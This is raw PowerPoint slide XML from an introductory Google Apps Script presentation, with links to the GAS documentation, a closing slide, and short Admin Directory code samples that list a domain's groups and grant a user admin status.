              <a:t>List all the groups in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>listAllGroups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>  let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>pageToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>  let page;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>  do {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    page = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>AdminDirectory.Groups.list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>({</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>: 'example.com',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>maxResults</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>: 100,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>pageToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>pageToken</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t> groups = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>page.groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    if (!groups) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>      console.log('No groups </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>.');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>      return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>Print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t> group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t> and email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t> group of groups) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>      console.log('%s (%s)', group.name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>group.email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>pageToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>page.nextPageToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>pageToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C4043"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle : coins arrondis 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769CD715-0251-6EEE-3372-4D8CB854A104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319201" y="2300532"/>
            <a:ext cx="2374321" cy="27591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1000" b="1" dirty="0" err="1"/>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0"/>
              <a:t> user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0"/>
              <a:t> admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>addAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>(email) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>  var user = {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>primaryEmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>: email,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>isAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>  };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>AdminDirectory.Users.update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>(user, email, {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>makeAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="600" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C4043"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B91386-1D7A-485C-77B9-155A8F3E8A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>46/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3638067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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398700" y="1800893"/>
            <a:ext cx="8346600" cy="1165668"/>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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Thanks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t> question?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129800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48FD14D8-8908-6C79-0428-A03657532529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129606"/>
            <a:ext cx="4008361" cy="3514239"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>To create a GAS project:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              <a:hlinkClick r:id="rId2">
                <a:extLst>
                  <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                    <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                  </a:ext>
                </a:extLst>
              </a:hlinkClick>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="90000"/>
                    <a:lumOff val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://script.google.com/home</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="90000"/>
                  <a:lumOff val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>GAS documentation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="90000"/>
                    <a:lumOff val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://developers.google.com/apps-script/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="90000"/>
                  <a:lumOff val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="1" indent="-171450" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>GAS API:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="90000"/>
                    <a:lumOff val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developers.google.com/apps-script/api/concepts</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="90000"/>
                  <a:lumOff val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> Google Apps Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{377EC920-2A0B-239A-D598-DEA84EDC3F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="431528" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>6/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA5823E-6F09-1481-7F99-8FD3CDA71835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1121"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4360206" y="815635"/>
            <a:ext cx="4220155" cy="2385062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F37B1CD-3453-3792-83D1-31900B89EEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3698933" y="2886725"/>
            <a:ext cx="5157911" cy="1807624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
